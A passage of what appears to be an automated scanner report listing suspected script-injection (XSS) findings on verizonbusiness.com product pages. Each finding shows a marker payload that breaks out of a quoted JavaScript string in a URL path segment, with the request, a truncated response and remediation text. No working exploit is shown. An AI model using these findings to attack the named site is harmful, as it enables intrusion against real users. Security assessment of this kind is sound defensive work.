The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad694'%3b33a83ce02e9 was submitted in the REST URL parameter 3. This input was echoed as ad694';33a83ce02e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-emailad694'%3b33a83ce02e9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/mobile-emailad694';33a83ce02e9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.196. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 612a0"%3b2e75e839ef7 was submitted in the REST URL parameter 3. This input was echoed as 612a0";2e75e839ef7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-email612a0"%3b2e75e839ef7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:50 GMT
Content-Type: text/html
Content-Length: 43678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/mobile-email612a0";2e75e839ef7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.197. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82fe8"%3bea8aa6a43b4 was submitted in the REST URL parameter 1. This input was echoed as 82fe8";ea8aa6a43b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products82fe8"%3bea8aa6a43b4/mobility/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Date: Wed, 17 Nov 2010 00:47:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products82fe8";ea8aa6a43b4/mobility/mobile-internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.198. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a407d'%3b0bb4a7e87c2 was submitted in the REST URL parameter 1. This input was echoed as a407d';0bb4a7e87c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsa407d'%3b0bb4a7e87c2/mobility/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsa407d';0bb4a7e87c2/mobility/mobile-internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.199. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f332a"%3b505833883a3 was submitted in the REST URL parameter 2. This input was echoed as f332a";505833883a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityf332a"%3b505833883a3/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:26 GMT
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityf332a";505833883a3/mobile-internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.200. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e76d'%3b6b102cf14f1 was submitted in the REST URL parameter 2. This input was echoed as 3e76d';6b102cf14f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility3e76d'%3b6b102cf14f1/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility3e76d';6b102cf14f1/mobile-internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.201. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4002a"%3b1c83d06f92b was submitted in the REST URL parameter 3. This input was echoed as 4002a";1c83d06f92b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-internet4002a"%3b1c83d06f92b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/mobile-internet4002a";1c83d06f92b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.202. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc33a'%3b3c0152b12c3 was submitted in the REST URL parameter 3. This input was echoed as bc33a';3c0152b12c3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-internetbc33a'%3b3c0152b12c3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43682
Date: Wed, 17 Nov 2010 00:49:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/mobile-internetbc33a';3c0152b12c3/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.203. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20e13'%3b56ef80f6432 was submitted in the REST URL parameter 1. This input was echoed as 20e13';56ef80f6432 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products20e13'%3b56ef80f6432/mobility/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products20e13';56ef80f6432/mobility/program-management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.204. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eb1c"%3b3807fb0311a was submitted in the REST URL parameter 1. This input was echoed as 1eb1c";3807fb0311a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1eb1c"%3b3807fb0311a/mobility/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products1eb1c";3807fb0311a/mobility/program-management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.205. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f63f"%3b55c442f263f was submitted in the REST URL parameter 2. This input was echoed as 1f63f";55c442f263f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility1f63f"%3b55c442f263f/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:10 GMT
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility1f63f";55c442f263f/program-management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.206. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 703f8'%3bcc71bbbe59c was submitted in the REST URL parameter 2. This input was echoed as 703f8';cc71bbbe59c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility703f8'%3bcc71bbbe59c/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility703f8';cc71bbbe59c/program-management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.207. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f3a8'%3bac7bb619e9a was submitted in the REST URL parameter 3. This input was echoed as 5f3a8';ac7bb619e9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/program-management5f3a8'%3bac7bb619e9a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/program-management5f3a8';ac7bb619e9a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
